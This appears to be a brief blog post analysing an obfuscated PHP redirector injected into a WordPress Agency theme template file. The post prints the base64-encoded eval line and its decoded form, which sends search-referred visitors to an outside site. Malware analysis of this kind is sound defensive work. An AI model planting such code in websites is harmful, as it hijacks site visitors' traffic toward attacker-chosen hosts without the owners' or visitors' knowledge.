Analysis: PHP.dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee

A quick analysis of an interesting sample that I pulled off VirusTotal

<?php      eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9pYm9udHUuMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
/**
 * This file adds the Landing template to the Agency Theme.
 *
 * @author StudioPress
 * @package Agency
 * @subpackage Customizations
 */

/*
Template Name: Landing
*/

// Add custom body class to the head
add_filter( 'body_class', 'add_body_class' );
function add_body_class( $classes ) {
   $classes[] = 'agency-landing';
   return $classes;
}

// Remove header, navigation, breadcrumbs, footer widgets, footer 
add_filter( 'genesis_pre_get_option_site_layout', '__genesis_return_full_width_content' );
remove_action( 'genesis_header', 'genesis_header_markup_open', 5 );
remove_action( 'genesis_header', 'genesis_do_header' );
remove_action( 'genesis_header', 'genesis_header_markup_close', 15 );
remove_action( 'genesis_after_header', 'genesis_do_nav' );
remove_action( 'genesis_after_header', 'genesis_do_subnav' );
remove_action( 'genesis_before_content_sidebar_wrap', 'genesis_do_breadcrumbs');
remove_action( 'genesis_before_footer', 'genesis_footer_widget_areas' );
remove_action( 'genesis_footer', 'genesis_footer_markup_open', 5 );
remove_action( 'genesis_footer', 'genesis_do_footer' );
remove_action( 'genesis_footer', 'genesis_footer_markup_close', 15 );

genesis();

On an initial investigation of the file, it is pretty obvious there is something funky going on. Spot the eval() right at the beginning of the code…

The decoded eval looks like this:

<?php error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
    $referer = $_SERVER['HTTP_REFERER'];
    $uag = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) {
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://ibontu.25u.com/");
                    exit();
                }
            }
        }
    }
}

A quick glance over the script shows it is a ‘redirector’, which has the intention to redirect traffic to an alternative location, in this case: header("Location: http://ibontu.25u.com/");

The script also deflects requests from bots, to prevent the bots from being redirected to the alternative site.

Crude, but effective – somewhat :/

References

VirusTotal
Obfuscated - https://www.virustotal.com/en/file/dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee/analysis/
DeObfuscated - https://www.virustotal.com/en/file/66899269383bd479b0e29a5136e496bbd8d068daf514909bf7b2f30174dac0b9/analysis

Leave a Reply

Your email address will not be published. Required fields are marked *